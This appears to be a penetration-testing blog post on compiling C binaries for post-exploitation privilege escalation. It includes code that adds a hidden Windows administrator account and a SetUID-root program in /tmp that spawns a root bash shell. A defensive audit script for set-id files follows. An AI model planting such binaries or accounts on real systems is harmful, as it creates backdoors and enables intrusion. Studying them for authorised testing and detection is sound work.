Compiling Custom Binaries
I created this post to address situations where a direct msfvenom reverse shell may be cumbersome to use. These binaries provide other ways to obtain an escalated shell after an initial foothold.
Additionally, these privilege escalation paths should make re-exploitation easier than juggling listeners and reverse shells.
Dependencies and Compiling
These binaries will be compiled on a Kali system - this should work on other Debian-based distributions like Ubuntu provided the packages are available.
sudo apt install gcc mingw-w64
Generally, compiling will follow the patterns below, but may vary depending on the imported libraries.
- Windows
i686-w64-mingw32-gcc code.c -l ws2_32 -o code.exe
Base code:
#include <stdio.h>
#include <stdlib.h>

int main(void){
    system("whoami");
    return 0;
}
- Linux
gcc code.c -o code
Base code:
#include <stdio.h>
#include <stdlib.h>

int main(void){
    system("whoami");
    return 0;
}
Useful Examples
Windows - Add New User to Administrators group
This binary must be executed with escalated privileges.
#include <stdio.h>
#include <stdlib.h>

int main(void){
    /* "username" and "password" are placeholders */
    system("net user username password /add");
    system("net localgroup Administrators username /add");
    return 0;
}
Linux - Elevate Bash Shell
The binary needs to have the SetUID bit set and be owned by root in order to run with escalated privileges. This can be done using the following snippet:
chown root:root /tmp/rootme; chmod +sx /tmp/rootme
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

int main(void){
    /* set the real and effective IDs to root so bash keeps the privileges */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
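Seen from the defender's side, the SetUID approach above leaves a root-owned set-id file in a world-writable directory such as /tmp, which is easy to audit for. The script below is an added example, not part of the original post; the function names and the directory list in the comments are assumptions.

```shell
#!/bin/sh
# Added audit example; function names and the directory list are assumptions.

# find_setid_files DIR [OWNER]
# Print regular files under DIR that carry the SetUID or SetGID bit and are
# owned by OWNER (user name or numeric uid, default root), one path per line.
find_setid_files() {
    # -xdev keeps find on one filesystem; -perm -4000 / -2000 match the
    # SetUID / SetGID bits that "chmod +sx" sets.
    find "$1" -xdev -type f -user "${2:-root}" \
        \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# audit_writable_dirs OWNER DIR...
# Report every match in the given directories; return 1 if any was found.
audit_writable_dirs() {
    owner=$1
    shift
    found=0
    for d in "$@"; do
        [ -d "$d" ] || continue
        # find exits non-zero on unreadable subdirectories; keep going anyway
        hits=$(find_setid_files "$d" "$owner" || true)
        [ -n "$hits" ] || continue
        printf '%s\n' "$hits" | sed 's/^/ALERT set-id file in writable dir: /'
        found=1
    done
    return "$found"
}

# Typical call on a live host (world-writable locations, adjust per system):
#   audit_writable_dirs root /tmp /var/tmp /dev/shm
```

Mounting these directories with the nosuid option makes the kernel ignore set-id bits on files stored there, so the mount option and the audit complement each other.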